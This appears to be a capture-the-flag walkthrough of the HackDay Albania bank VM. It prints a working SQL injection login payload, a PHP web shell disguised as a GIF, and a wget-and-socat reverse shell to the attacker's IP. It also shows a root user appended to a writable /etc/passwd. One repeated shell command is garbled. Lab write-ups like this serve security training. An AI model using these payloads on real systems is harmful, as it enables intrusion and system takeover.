CTF: HackDay Albania Bank Walkthrough
This CTF challenge is fun and provides a lot of opportunities to work with SQL injection, writeable file abuse and is actually not that difficult but provides a lot of opportunity to practice skill sets. I really enjoyed this one.
Tools & Techniques
- nmap, dirb
- Burp Suite
- SQLMap
- Reverse Shell
- Exploiting a writeable file
Enumeration
|
1 2 3 4 5 |
sudo arp-scan -l nmap 192.168.0.42 sudo nmap -sV -p- -AO 192.168.0.42 |
Discovering the Banking Website
I would highly recommend you check out mrb3n’s walkthrough. Ben gets it right. He writes a script that iterates through the directories trying to find the correct folder. You can improve your ack and cut skills.
Ultimately, I just went down the list copying and pasting the folders into the browser to see what came up.
SQL Injection
After running dirb and nikto with little useful results my gut told me this would be a SQL injection vulnerability. I used SQLMap to identify some SQL Injection vulnerabilities. At first, I tried using the vulnerabilities with Burp Suite but that didn’t work. However, I was able to copy and paste the vulnerability into the login form and gain access to a user.
You can easily get access by pasting the found SQL injection vulnerability into the contact form field for the username and use a “#” for the password.
|
1 2 3 4 5 |
# username ' RLIKE SLEEP(1) --jUMp # password # |
I also recommend reading about what reedphish did. The article demonstrates using wfuzz to find a user that could be brute-forced.
The cool thing about using Burp Suite I was able to see that SQL Injection cause a delay before the data loaded. Unfortunately, that’s all I saw.
Uploading a Malicious Image
Once I had access to the login screen of the bank website there was a screen to upload a support ticket with an image. It’s not very clear about what you can or can’t upload so I tried uploading a text file and it gave me this error.
So… I created a malicious image. mal.jpg
|
1 2 |
GIF89; <?php system($_GET['c']); ?> |
Burp Suite
Before I got a reverse shell I tried to use Burp Suite to get the call home but it did not work. So, I pulled information out like the users and started running that information through hydra. This resulted in no credentials after 30 minutes of running.
Reverse Shell
Using the pentest monkey’s PHP reverse shell I customized that and uploaded it to the help desk. This worked flawlessly.
To start the listener for the reverse shell I ran these commands:
|
1 2 |
sudo ufw allow 443 sudo nc -nvlp 443 |
Getting PTTY
I tried using python but python 2 is not installed. For whatever reason I didn’t think about trying ptyhon 3 so I ended up trying a new method using a static binary like socat.
I read about this technique here: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
|
1 2 3 |
# in parrot os.. start a netcat listener sudo ufw allow 4444 sudo nc -nvlp 4444 |
|
1 2 3 4 5 6 |
# in current reverse shell use socat to get a 2nd reverse shell with tty cd /tmp/ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444 # if you loose the reverse shell you can get it back running this command socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444 |
Privilege Escalation
Once I had a reverse shell and started snooping around I could see that there was one user on the box who had recently used a sudo command successfully. This turns out to be a possible rabbit hole.
LinEnum
I pulled LinEnum and executed that script from the /tmp folder and found a way up. It turns out that the /etc/passwd was write enabled. This means I could create a new user or put a password in place for taviso.
Creating a Root User
First, you’ll need to get a hashed password using openssl. Do this on your attack machine and base64 encode the string.
|
1 2 3 4 5 6 7 8 9 10 11 |
# in parrot os (I used "asdf" for the password) openssl passwd -1 # generated password is $1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs. # final string for /etc/passwod... this needs to be base64 encrypted. hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash # use an online base 64 tool aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g= |
In the reverse shell you will need to execute this command to create a user in the /etc/passwd file.
|
1 2 3 4 5 6 |
# echo "hax" user into /etc/passwd echo aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g= | base64 -d >> /etc/passwd # switch to that user su hax asdf |
Root Flag
